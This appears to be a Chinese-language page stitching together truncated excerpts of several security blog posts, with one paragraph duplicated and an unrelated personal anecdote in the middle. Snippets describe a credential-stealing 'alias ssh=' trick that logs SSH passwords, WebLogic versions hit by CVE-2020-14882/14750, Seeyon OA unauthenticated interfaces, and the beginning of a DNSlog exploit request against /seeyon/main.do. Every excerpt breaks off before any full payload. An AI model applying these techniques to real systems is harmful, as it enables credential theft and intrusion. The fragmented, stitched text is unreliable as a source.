Linux下低权限用户记录SSH的密码
实现思路 当用户执行 ssh user@remotehost 时,实际上执行的是我的恶意脚本,负责将用户输入的密码存在本地,并传参给正常的SSH连接,实现抓取SSH密码的功能。具体步骤首先使用 alias 命令创建一个别名这样当用户执行ssh时,执行的是指定的脚本alias ssh="
实现思路 当用户执行 ssh user@remotehost 时,实际上执行的是我的恶意脚本,负责将用户输入的密码存在本地,并传参给正常的SSH连接,实现抓取SSH密码的功能。具体步骤首先使用 alias 命令创建一个别名这样当用户执行ssh时,执行的是指定的脚本alias ssh="
影响版本WebLogic 10.3.6.0.0WebLogic 12.1.3.0.0WebLogic 12.2.1.3.0WebLogic 12.2.1.4.0WebLogic 14.1.1.0.0需要出网环境配合cve-2020-14882 POC 同样可以配合cve-2020-14750绕过进控
最近跟高中同学吃饭,偶然听到他前不久去拜访过我们的高中老师。然后老师还特意问起了我现在在干嘛什么的,老师说她收到过一份感谢信,感谢培养出这么优秀的人七七八八的。让我有些吃惊,我感觉应该是大学或者哪场HVV比赛发的吧,但是还是让我有些小欣喜!让别人能为你骄傲其实这也能成为让我不断努力学习的动力,最近有
这个POC很早有人放出来了,但是大HW被人提交成了0day。其实19年htmlofficeservlet出来的时候,就肯定有人去分析了那几个接口。主要写在WEB.XML里面的servlet就那几个,但是其实这三个只是可以未授权访问,但是除了htmlofficeservlet以外,其他两个都需要认证后
一个是需要认证的任意文件上传,并且还有个编码问题。今天重新看了下,发现还真有个无需认证的。日,太傻了。
1.打开http://www.dnslog.cn/点击GetSubDomain按钮后,下方会出现一个域名。2.复制域名,在下方代码中替换。POST/seeyon/main.do?method=changeLocaleHTTP/1.1Host:xxx.xxx.xxx.xxxContent-Length